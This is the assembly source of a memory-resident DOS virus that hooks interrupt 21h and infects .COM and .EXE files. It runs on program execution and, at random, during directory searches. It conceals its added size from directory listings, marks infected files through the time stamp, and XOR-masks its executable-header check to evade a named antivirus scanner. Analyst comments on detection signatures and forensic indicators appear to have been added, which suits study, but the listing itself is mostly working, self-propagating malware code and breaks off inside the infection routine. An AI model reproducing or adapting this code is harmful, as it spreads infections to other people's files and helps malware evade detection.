📄 compo.asm
;% You-name-the-bitch %
;──────────────────────
; Assembler setup: tiny memory model, one code segment, image origin 100h
; (the offset at which DOS loads a .com image).
.model tiny
.code
org 100h
; Size constants derived from the span between the labels start and last
; (last is defined outside this part of the listing).
; pagesize: the span in 512-byte units, plus one.
pagesize equ (((offset last) - (offset start)) shr 9) + 1
; parasize: the span in 16-byte paragraphs, plus one.
parasize equ (((offset last) - (offset start)) shr 4) + 1
; bytesize: parasize expressed in bytes. It is the byte count copied into the
; resident block and the amount subtracted from directory-entry sizes further down.
bytesize equ (parasize shl 4)
; lastpage: bytesize minus pagesize*512. Not referenced in the visible part of
; the file; presumably paired with pagesize for .exe header fields -- confirm.
lastpage equ bytesize - (pagesize shl 9)
; Entry stub executed before the host program.
; Analysis notes:
;   - ds is pushed first and is popped again as es in restore; at DOS program
;     entry it is expected to hold the PSP segment (assumption, not shown here).
;   - call install leaves the offset of entry on the stack. install/gores load
;     that value into bp and use it as the base for every cs:bp[N] reference.
start:
push ds
call install
entry:
; restore reads the fields below at entry+2, entry+4 and entry+6, so the layout
; only holds if this jmp assembles to a 2-byte short jump.
jmp restore
; Information about host program
; Initial value 020CDh is the byte pair CD 20 (int 20h, terminate program).
orgip dw 020CDh ; Entry point if .exe,
orgcs dw 0 ; if .com first 3 bytes of file.
; restore tests this byte: 0 selects the .exe path, anything else the .com path.
com db 0FFh ; If .exe com=0 if .com com=FF
; Residency check, reached by the call in the entry stub.
; Detection-relevant signature: int 21h with ah=30h and bx=1009 (decimal); a
; resident copy answers with bx=9001 (see vector21). An unmodified DOS does not
; return 9001 for this call, so the pair identifies a resident copy.
; Out (already resident): bp = offset of entry, then ret back to entry.
; Out (not resident):     falls to gores with the return address still on the stack.
install:
; Check if already resident
mov ah, 30h ; Get dos version
mov bx, 1009 ; Installation check
int 21h
cmp bx, 9001 ; Is installed?
jne gores
; bp = word on top of the stack = return address pushed by call install.
mov bp, sp ; Get delta offset
mov bp, ss:[bp]
ret
; Five-byte far-jump thunk: opcode 0EAh followed by offset and segment words.
; gohigh stores the previous int 21h vector into the two words, and chnexit
; jumps here to pass a request on to the previous handler.
org21:
db 0EAh ; Buffer for original int21
org21o dw ?
org21s dw ?
; Not yet resident: obtain a memory block for the resident copy.
; In:  al = value returned by int 21h/ah=30h in install (DOS major version);
;      stack top = return address from call install.
; Flow: version below 3 -> restore (no installation attempt).
;       allocation ok   -> gohigh with ax = segment of the new block.
;       allocation fail -> shrink the current block once via the MCB and retry;
;                          if the shrink fails, go to restore.
gores:
; Discards the return address into bp, so bp = offset of entry from here on.
pop bp
cmp al, 03h ; Check dos version
jb restore
; Try to allocate memory
memall: mov ah, 48h ; Allocate memory
mov bx, parasize+3
int 21h
jnc gohigh
; Try to decrease host memory
; The memory control block sits one paragraph below the block it describes;
; the word at offset 3 is the block size in paragraphs.
; NOTE(review): es is assumed to still hold the host's PSP segment here -- confirm.
push es ; Get MCB
mov bx, es
dec bx
mov es, bx
mov bx, es:[03h] ; Get size of memory
sub bx, parasize+4 ; Calculate needed memory
pop es
mov ah, 4Ah ; Decrease memory block
int 21h
; Loops back to the allocation request for as long as the resize succeeds.
jnc memall ; Allocate memory for virus
jmp restore
; Copy the code into the newly allocated block and hook int 21h.
; In:  ax = segment returned by the allocate call, bp = offset of entry.
; Forensic indicators left behind by this block:
;   - the block's MCB owner word is overwritten with 8, so the block is not
;     attributed to the host's PSP;
;   - the int 21h vector points at vector21 inside that block.
gohigh:
; Move virus to new memory
dec ax ; es to new mcb
mov es, ax
mov word ptr es:[1], 8 ; mark dos as owner
; es:10h is the first byte of the allocated block (MCB segment + 1 paragraph).
mov di, 10h ; Set es:di to new block
push cs ; Set ds:si to virus code
pop ds
mov si, bp
; entry - 4 = start (1-byte push ds + 3-byte call install).
sub si, 4 ; Adjust for first call
mov cx, bytesize
cld
rep movsb
; Install in int21 vector
; ds = MCB segment - 0Fh = block segment - 10h, so offset 100h in ds addresses
; the first copied byte and the labels keep their assembled offsets.
sub ax, 0Fh ; Adjust for org 100h
mov ds, ax
mov ax, 3521h ; Save int21 vector
int 21h
; Stored through ds, i.e. into the org21 thunk of the resident copy.
mov org21o, bx
mov org21s, es
; al is not reloaded; the set-vector call relies on it still holding 21h.
mov ah, 25h ; Set int21 vector
mov dx, offset vector21
int 21h
; Hand control back to the host program.
; In:  bp = offset of entry; stack top = the ds value pushed at start.
; The saved fields are read through cs:bp: [2] = orgip, [4] = orgcs, [6] = com.
; Only ds and es are set up for the host; other registers are left as they are.
restore:
; Restore original program
; es = saved segment; it is pushed again so it stays available on the stack.
pop es
push es
cmp byte ptr cs:bp[6], 00h ; Check file type
je restexe
; Restore .com program
push es
pop ds
; With the segment already on the stack, pushing 100h builds the far return
; address segment:100h that the retf below consumes.
mov di, 100h
push di
; Write the three saved bytes back to es:100h: the word orgip, then the low
; byte of orgcs.
mov ax, cs:bp[2]
stosw
mov al, cs:bp[4]
stosb
retf
restexe:
; Restore .exe program
; ax = saved segment; target cs = saved segment + orgcs + 10h.
pop ax
mov ds, ax
add ax, cs:bp[4] ; relocate cs
add ax, 10h
push ax
mov ax, cs:bp[2] ; get ip
push ax
retf ; Jump to host
; Resident int 21h handler installed by gohigh. Dispatch on the request in ah/ax:
;   ah=30h with bx=1009 -> residency check, answered with bx=9001
;   ax=4B00h            -> call infect, then chain to the previous handler
;   ah=11h / 12h        -> fcb (FCB find first / find next)
;   ah=4Eh / 4Fh        -> run the call, then findhandle when it succeeded
;   anything else       -> chain to the previous handler through org21
; dos and findhandle are defined outside the visible part of the file; dos
; presumably issues the request to the saved int 21h handler -- confirm.
; retf 2 returns from the interrupt while discarding the caller's saved flags
; word, so the caller sees the flags produced inside this handler.
vector21:
cmp ah, 30h ; Get dos version?
jne chkexe
cmp bx, 1009 ; Installation check?
jne chkexe
call dos
mov bx, 9001 ; Return residency code
retf 2
chkexe:
cmp ax, 4B00h ; Load and execute?
jne chkfcb
; On this request ds:dx is passed through unchanged to infect.
call infect ; Infect file
jmp chnexit
chkfcb:
cmp ah, 11h ; Find first (FCB)?
je fcb
cmp ah, 12h ; Find next (FCB)?
je fcb
cmp ah, 4Eh ; Find first (handle)?
je fhdl
cmp ah, 4Fh ; Find next (handle)?
jne chnexit
fhdl: call dos
; Carry set: the find call failed, return its result to the caller untouched.
jnc fhdls
retf 2
fhdls: jmp findhandle
chnexit:
jmp org21
; Post-processing of FCB find first / find next (ah=11h/12h) results.
; What an analyst should take from this block:
;   - Infection marker: the low five bits of the entry's time field equal 3.
;   - Stealth: for entries whose extension starts with "CO" or "EX" and that
;     carry the marker, bytesize is subtracted from the low word of the size
;     field, so FCB-based directory listings under-report the file size while
;     the handler is resident.
;   - Unmarked CO*/EX* entries are passed to infect in roughly one of four
;     cases, using only the bare file name (no drive or path).
; NOTE(review): the field offsets below are consistent with a directory entry
; following the drive byte in the DTA -- confirm against getdta, which is not
; visible here and is assumed to return ds:si pointing at the DTA.
fcb:
; Called on find first/find next fcb
; Perform dos call
call dos
or al, al ; Check if a file was found
jz exist
retf 2
exist:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax, 6200h ; Get psp
call dos
mov es, bx
; Compares the caller's PSP segment with the word at offset 16h of that PSP and
; does nothing further when they differ.
cmp bx, es:[16h] ; Ensure that dos is calling
jne fcbexit
call getdta ; Get address of fcb
; First byte 0FFh marks an extended FCB; skip the 7 remaining prefix bytes.
lodsb ; Check if extended
cmp al, 0FFh
jne noext
add si, 7
noext:
; bx = start of the 8-character name field (used later by cvtasciz).
mov bx, si
add si, 8 ; Check extension
; ax = first two characters of the extension.
lodsw
push ax
; si now addresses the low byte of the time field.
add si, 0Ch ; Check for infection
lodsb
and al, 1Fh
cmp al, 03h
pop ax
; Keep the marker comparison result; popf in fcbcom/fcbexe brings it back.
pushf
; si now addresses the low word of the file size.
add si, 5
cmp ax, 'OC'
je fcbcom
cmp ax, 'XE'
je fcbexe
popf
jmp fcbexit
fcbcom:
; Check for infection
popf
jne fcbcomni
; Marked entry: hide the added length (low word of the size only).
sub word ptr [si], bytesize
jmp fcbexit
fcbcomni:
in al, 41h ; Get timer (rnd)
; Continue only when the two low bits read from the port are both zero.
test al, 03h ; 25% infection
jne fcbexit
call cvtasciz ; Convert to asciz
; Stored low byte first, so the two words spell ".COM".
mov ax, 'C.' ; Append extension
stosw
mov ax, 'MO'
stosw
jmp fcbinfect
fcbexe:
; Check for infection
popf
jne fcbexeni
; Marked entry: hide the added length (low word of the size only).
sub word ptr [si], bytesize
jmp fcbexit
fcbexeni:
in al, 41h ; Get timer (rnd)
; Continue only when the two low bits read from the port are both zero.
test al, 03h ; 25% infection
jne fcbexit
call cvtasciz
; Stored low byte first, so the two words spell ".EXE".
mov ax, 'E.'
stosw
mov ax, 'EX'
stosw
fcbinfect:
; Terminate the name with a zero byte, then pass it as ds:dx = cs:last.
xor al, al
stosb
mov dx, offset last
push cs
pop ds
call infect
fcbexit:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
retf 2
; cvtasciz: copy the space-padded name field into the buffer at cs:last.
; In:    ds:bx = start of the 8-character name field
; Out:   es = cs, di = first byte after the copied name (the callers append
;        the extension and the terminating zero there)
; Clobb: al, cx, si, di, es, flags
; Copying stops at the first space or after 8 characters, whichever comes first.
cvtasciz proc
push cs ; Convert to asciz
pop es
mov si, bx
mov di, offset last
mov cx, 8
loop3: lodsb
cmp al, ' '
je loopx
stosb
loop loop3
loopx: ret
cvtasciz endp
infect proc
; Called on load and execute
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax, 3D82h ; Open victim
call dos
jc exitinfect
xchg ax, bx
mov ax, 5700h ; Save file date/time
call dos
push dx
push cx
mov ah, 3Fh ; Read first bytes
push cs
pop ds
lea dx, orgip
mov cx, 2
call dos
xor orgip, 4523h ; Check if .exe file
cmp orgip, 'MZ' xor 4523h ; TBScan fooled again...
je infectexe
cmp orgip, 'ZM' xor 4523h
je infectexe
xor orgip, 4523h
jmp infectcom
infectdone:
pop cx ; Restore date/time of file
pop dx